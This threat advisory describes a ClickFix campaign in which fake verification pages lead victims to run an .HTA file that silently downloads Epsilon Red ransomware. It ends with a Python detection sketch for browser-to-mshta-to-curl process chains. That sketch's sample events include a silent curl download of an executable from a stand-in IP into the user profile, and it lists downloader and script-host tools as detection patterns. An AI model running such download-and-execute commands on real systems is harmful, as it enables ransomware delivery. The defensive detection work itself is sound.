Current Cyber Threats

Threat Actors Lure Victims Into Downloading .HTA Files Using ClickFix To Spread Epsilon Red Ransomware

Summary:
CloudSEK’s TRIAD recently uncovered a ClickFix-themed malware delivery site associated with the Epsilon Red ransomware. Unlike previous ClickFix campaigns, this site does not copy malicious commands to the clipboard after the victim clicks the “verify you are human” button; instead it redirects the victim to a secondary page. That second page instructs the victim to save and open a .HTA file containing malicious shell commands, which are silently executed through ActiveX. Researchers note that one of these shell commands navigates to the victim’s user profile directory and downloads the payload (Epsilon Red ransomware) from an attacker-controlled IP. The payload is downloaded discreetly, with no visible prompts or warnings for the victim, which reduces the likelihood of detection.

Security Officer Comments:
Epsilon Red ransomware was first identified in 2021. While the gang’s ransom note styling resembles that of REvil ransomware, the two groups remain distinct in their tactics and infrastructure. According to researchers, Epsilon Red actors are impersonating trusted services such as Discord Captcha Bot, Kick, and Twitch to deliver Windows payloads via ClickFix. Mimicking such services increases the likelihood that the social engineering succeeds. Overall, the use of ActiveX, a legacy technology that enables remote code execution directly from browser sessions, effectively bypasses the traditional download protections in place. Furthermore, relying on natively supported Windows file types like .HTA makes detection all the more challenging, contributing to the success of such campaigns.

Suggested Corrections:
  • Disable ActiveX and Windows Script Host (WSH): Enforce Group Policies to block legacy script execution vectors (WScript.Shell, ActiveXObject) in all environments.
  • Threat Feed Integration and IP Blocking: Proactively ingest threat intel to blacklist known attacker IPs and domains, as well as IOFAs (Indicators of Future Attack) tied to ClickFix campaigns.
  • Endpoint Behavior Analytics: Deploy EDR rules to flag hidden executions (shell.Run, cmd /c, silent downloads via curl) and suspicious child process creation from browsers.
  • Security Awareness Training: Simulate attacks that impersonate familiar services (e.g., Discord bots, Twitch) to condition users against interacting with fake verification pages.
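The EDR detection logic suggested above, sketched as an added example that is not part of the CloudSEK report or this advisory: three rules run over constructed process-creation events shaped like Sysmon Event ID 1 fields (a browser spawning mshta.exe, mshta.exe launching cmd /c, and a silent curl fetch from a bare IP into the user profile). The event layout, rule names, file paths and the 203.0.113.10 documentation-range address are all assumptions chosen for illustration.

```python
import re
from dataclasses import dataclass

# Constructed process-creation events shaped like Sysmon Event ID 1 fields
# (ParentImage, Image, CommandLine). None of this is real telemetry.
@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
DOWNLOADERS = {"curl.exe", "certutil.exe", "bitsadmin.exe"}
RAW_IP_URL = re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}\b")

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def classify(ev: ProcEvent) -> list[str]:
    """Return the names of the rules an event matches (empty list = not flagged)."""
    parent, child = basename(ev.parent_image), basename(ev.image)
    cmd = ev.command_line.lower()
    args = cmd.split()
    hits = []
    # Rule 1: a browser spawning a script host or shell (the .HTA opened from the ClickFix page).
    if parent in BROWSERS and child in SCRIPT_HOSTS | SHELLS:
        hits.append("browser_spawns_script_host")
    # Rule 2: mshta.exe/wscript.exe launching "cmd /c", the WScript.Shell.Run pattern from an HTA.
    if parent in SCRIPT_HOSTS and child in SHELLS and "/c" in args:
        hits.append("script_host_shell_exec")
    # Rule 3: a download tool fetching from a bare IP into the user profile with silent flags.
    if (child in DOWNLOADERS and RAW_IP_URL.search(cmd) and ("-s" in args or "-o" in args)
            and ("%userprofile%" in cmd or "\\users\\" in cmd)):
        hits.append("silent_download_to_profile")
    return hits

def scan(events: list[ProcEvent]) -> dict[int, list[str]]:
    """Map each flagged event's index to the rules it tripped."""
    return {i: h for i, ev in enumerate(events) if (h := classify(ev))}

SAMPLE_EVENTS = [  # constructed sample data; 203.0.113.10 is a documentation-range address
    ProcEvent(r"C:\Program Files\Google\Chrome\Application\chrome.exe",
              r"C:\Windows\System32\mshta.exe", r"mshta.exe C:\Users\alice\Downloads\verify.hta"),
    ProcEvent(r"C:\Windows\System32\mshta.exe", r"C:\Windows\System32\cmd.exe",
              r"cmd.exe /c cd %USERPROFILE% && curl -s http://203.0.113.10/a.exe -o a.exe"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\curl.exe",
              r"curl -s http://203.0.113.10/a.exe -o C:\Users\alice\a.exe"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Program Files\Google\Chrome\Application\chrome.exe",
              r"chrome.exe --profile-directory=Default"),  # benign: no rule should fire
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\curl.exe",
              r"curl https://example.com/api/status"),  # benign: named host, not silent
]
```

Running scan(SAMPLE_EVENTS) flags the first three events, one rule each, and leaves the two benign events unflagged; in production the same rules would be expressed in the EDR's query language rather than Python.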
Link(s):
https://www.cloudsek.com/blog/threa...ing-clickfix-to-spread-epsilon-red-ransomware